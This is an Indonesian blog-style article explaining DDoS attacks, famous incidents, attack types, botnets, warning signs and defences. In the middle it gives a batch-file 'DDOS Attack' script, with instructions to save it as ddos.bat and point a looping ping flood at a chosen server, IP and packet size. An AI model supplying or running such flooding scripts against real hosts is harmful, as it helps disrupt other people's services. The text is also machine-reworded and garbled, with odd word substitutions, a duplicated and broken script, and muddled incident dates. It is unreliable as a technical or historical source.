Apa itu DDoS? DDoS merupakan abreviasi dari Distributed Denial of Service atau dalam bahasa Indonesia sanggup diartikan sebagai Penolakan Layanan secara Terdistribusi. DDoS ialah jenis serangan yang dilakukan dengan cara membanjiri kemudian lintas jaringan internet pada server, sistem, atau jaringan. Umumnya serangan ini dilakukan memakai beberapa komputer host penyerang hingga dengan komputer sasaran tidak sanggup diakses.
DDoS ialah serangan yang sangat terkenal digunakan oleh hacker. Selain mempunyai banyak jenis, DDoS mempunyai konsep yang sangat sederhana, yaitu menciptakan kemudian lintas server berjalan dengan beban yang berat hingga tidak sanggup lagi menampung koneksi dari user lain (overload). Salah satu cara dengan mengirimkan request ke server secara terus menerus dengan transaksi data yang besar.
Serangan DDoS Terbesar
Percobaan serangan DDoS setiap tahun selalu meningkat. Penggunanya tidak hanya user yang ingin mencari sensasi, bahkan digunakan dengan alasan politik, atau tindak kejahatan yang ingin mengganggu stabilitas server dan bahkan mencuri data yang ada di dalamnya.
catat sebagai serangan DDoS terbesar sepanjang sejarah. Serangan ini mencapai puncak tertinggi 400 Gbps dan menjadikan Github tidak sanggup diakses beberapa menit. Di tahun berikutnya terjadi serangan ke salah satu klien Cloudflare dengan kekuatan 33% lebih besar dibandingkan serangan yang dilakukan ke Spamhaus.
Baca juga : Pengertian Router Dan Pungsinya
Baca juga : Pengertian Router Dan Pungsinya
Selain Spamhaus dan Cloudflare, Serangan ke BBC tahun 2015 juga tercatat sebagai serangan DDoS terbesar sepanjang sejarah. Serangan ini menjadikan hampir semua layanan BBC lumpuh. Keseluruhan domain tidak sanggup diakses, bahkan layanan On-Demand dan radio juga mati.
Github juga menjadi korban serangan serangan DDoS. Pada tahun 2015 bukan menjadi serangan terbesar yang ditujukan ke situs itu. Ternyata, pada tahun 2018 terjadi serangan yang sama dan hampir 3 kali lebih besar dibanding serangan yang terjadi sebelumnya.
Github mendapat serangan DDOS yang mencapai puncak tertinggi transaksi data yang sangat fantastis, yaitu 1.35 Tbps. Serangan tersebut berasal dari ribuan Autonomous System (ASN) di puluhan ribu titik selesai yang unik. Cara kerja serangan DDoS ialah melalui penyalahgunaan instance memcached yang memang sanggup di saluran melalui internet dengan UDP secara publik.
Serangan ke Github awal tahun ini memakai DDoS ialah serangan DDOS terbesar sepanjang sejarah yang tercatat dikala ini.
Cara Kerja dan Tujuan DDoS
Konsep sederhana DDoS attack ialah membanjiri kemudian lintas jaringan dengan banyak data. konsep Denial of SERVICE Konsep sederhana DDoS attack ialah membanjiri kemudian lintas jaringan dengan banyak data. bisa dibagi menjadi 3 tipe penggunaan, yakni sebagai berikut :- Request flooding merupakan teknik yang digunakan dengan membanjiri jaringan menggunakan banyak request. Akibatnya, pengguna lain yang terdaftar tidak sanggup dilayani.
- Traffic flooding merupaka teknik yang digunakan dengan membanjiri kemudian lintas jaringan dengan banyak data. Akibatnya, pengguna lain tidak sanggup dilayani.
- Mengubah sistem konfigurasi atau bahkan merusak komponen dan server juga termasuk tipe denial of service, tetapi cara ini tidak banyak digunakan alasannya cukup sulit untuk dilakukan.
- DDoS Layer Aplikasi
Kategori penyerangan ini ialah mengambil semua sumber daya dari target. Target dari serangan ialah later dimana halaman website dihukum pada server dan mengirimkan respon ke HTTP request. Sangat ringan bila hanya melayani satu request. Sedangkan akan menjadi duduk kasus bila melayani banyak request secara bersamaan apalagi bila menjalankan query database juga.
- DDoS Protokol
Serangan ini mengekploitasi TCP dengan cara mengirimkan paket SYN dengan spoof alamat IP dalam jumlah yang besar. Setiap koneksi yang masuk akan ditanggapi oleh server yang menunggu proses koneksi berjalan, namun tidak pernah terjadi. Hal ini akan menjadikan proses yang terus berjalan pada server yang sanggup menimbulkan overload.
- Volumetrik DDoS
Tujuan dari serangan DDoS ini ialah menghabiskan semua bandwidth yang tersedia antara sasaran dengan jaringan internet. Caranya ialah dengan menciptakan kemudian lintas yang sangat padat, menyerupai penggunaan botnet.
Tidak semua jenis yang sanggup kami bahas, masih ada banyak tipe serangan DDoS yang tercatat selama ini, menyerupai serangan Memcached DDoS, NTP Apmlification, DNS Flood, UDP Flood, dan masih banyak lainya.
Teknik DDoS
Serangan DDoS ialah teknik penyerangan yang mempunyai banyak cara sederhana, menyerupai memakai virus, botnet, dan perangkat lunak yaitu RailGun.
1. Botnet Pada pengembangannya, serangan DDoS dilakukan dengan dukungan kumpulan bot yang dijalankan secarabersama-sama. Bot disisipkan pada malware yang kemudian di tanam ke komputer yang terhubung ke jaringan internet.
Jumlah komputer ini sanggup puluhan hingga dengan jutaan, tergantung banyaknya komputer yang telah terinfeksi malware. Semua komputer ini dinamakan dengan botnet, sedangkan satu komputer yang terinfeksi dinamakan dengan komputer zombie.
Hanya memakai satu perintah saja, botnet pribadi menjalankan perintah untuk melaksanakan DDoS ke komputer sasaran dalam waktu bersamaan.
2. Virus Di internet, seseorang yang berencana melaksanakan DDoS ialah dengan mengembangkan virus melalui file yang dibagikan ke banyak sekali situs yang terhubung dengan internet. Virus sengaja diciptakan salah satunya ialah untuk menjalankan bot melalui script yang berjalan pada sistem operasi. Bahkan beberapa virus sanggup mengambil hak saluran dari perangkat yang sudah mengunduh script dan dijalankan pada sistem operasi.
Saat komputer sudah terinfeksi virus DDoS, sebuah virus akan secara aktif melaksanakan serangan DDoS ke server atau ke alamat IP tertentu yang sudah ditentukan.
Ciri Website Anda Terkena DDoS
- Bandwidth mengalami kemudian lintas yang sangat padat secara drastis baik download atau upload. Terjadi datang – datang dan berlangsung secara terus menerus. Jika sasaran ialah VPS, sanggup jadi konsumsi bandwidth akan mencapai batas penggunaan sehingga VPS tidak sanggup diakses.
- Load CPU menjadi sangat tinggi padahal tidak ada proses yang dihukum yang menjadikan kinerja menjadi menurun hingga dengan website tidak sanggup diakses.
- Jika sistem Anda berada pada penyedia layanan VPS, terkadang ada yang menyediakan layanan isu bila sewaktu-waktu terjadi acara mencurigakan pada server. Anda juga sanggup mengaturnya sendiri.
Ada banyak sekali cara yang sanggup Anda lakukan untuk mencegah serangan DDoS yang menciptakan sistem berhenti bekerja.
- Memperbarui sistem operasi ke versi terbaru. Hal ini bertujuan untuk mengatasi menutupi bagian-bagian rentan yang sanggup saja dijadikan pintu masuk saluran ilegal.
- Membatasi saluran dari dan ke sistem sehingga sanggup menyaring trafik data yang masuk dan keluar pada komputer atau server yang Anda gunakan.
- Jika serangan yang terjadi memakai Smurf, Anda sanggup mencoba mengatasinya dengan cara mematikan sementara broadcast address pada router. Bisa juga dengan melaksanakan penyaringan atau membatasi undangan ICMP pada firewall.
- Menggunakan perangkat lunak keamanan perhiasan untuk sistem.
Inilah script DDOS,
copy kemudian paste di notpad
save, nama ddos.bat
°^°^°^ °^°^°^
@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo
echo DDOS With Batchfile
echo
echo.
set /p x=Server-Target:
echo.
echo
ping %x%
echo
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
color 0a
cls
echo.
echo
echo DDOS With Batchfile
echo
echo.
set /p x=Server-Target:
echo.
echo
ping %x%
echo
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS
kira kira menyerupai itu sih,
#
Penjelasan :Server Target: Isi dengan alamat server atau website yang nantinya jadi sasaran eksekusiIp Host: isi dengan Ip dari website targetPacket Size: Isi Berapa besar data yang akan dikirimkan ke website target.
Cara Mengatasi DDoS
Ada beberapa cara yang sanggup Anda lakukan bila website atau sistem terkena DDoS. Berikut ini beberapa yang sanggup Anda coba:
- Melakukan Identifikasi Serangan, biasanya bila Anda mempunyai server sendiri, gejala bila sedang terjadi serangan DDoS akan terlihat. Jika dikethui maka Anda sanggup berkemas-kemas melaksanakan penanganan sebelum terjadi serangan DDoS yang lebih serius.
- Mempertahankan Parameter Network, ada beberapa langkah teknis yang sanggup diambil untuk mengurangi sebagian efek dari serangan, dan beberapa diantaranya cukup sederhana. Misalnya anda dapat:
- Memperbesar Bandwidth, bila masih sanggup melaksanakan pelebaran bandwidth, cara ini sanggup dicoba untuk memperlihatkan waktu supaya sistem tidak hingga down. Jika serangan DDoS terlalu besar maka cara ini mungkin tidak akan kuat banyak untuk penanganan.
- Menghubungi ISP atau Hosting Provider, salah satu ciri serangan DDoS ialah menyerang alamat ip dari sistem, sehingga Anda sanggup melaporkan bencana tersebut kepada penyedia jasa internet yang digunakan dan mendeteksi serangan yang terjadi.
- Menghubungi Spesialis DDoS, langkah terakhir yang sanggup diambil ialah dengan menghubungi layanan seorang hebat DDoS yang sanggup mencoba membantu Anda untuk menangani serangan yang terjadi.
Kesimpulan
DDoS ialah teknik penyerangan pada sistem yang sangat terkenal digunakan. Selain sederhana, dengan modifikasi strategi, DDoS sanggup menjadi teknik yang sangat ampuh untuk meenggantu sistem.
Ada beberapara cara melaksanakan DDoS menyerupai memakai request flooding dan traffic flooding. Kedua cara ini mempunyai kesamaan yaitu membanjiri kemudian lintas jaringan dengan banyak data atau request. Jika berhasil maka pengguna lain akan kesulitan untuk melaksanakan saluran ke sistem dan sanggup jadi menjadikan sistem rusak dan tidak sanggup diakses.
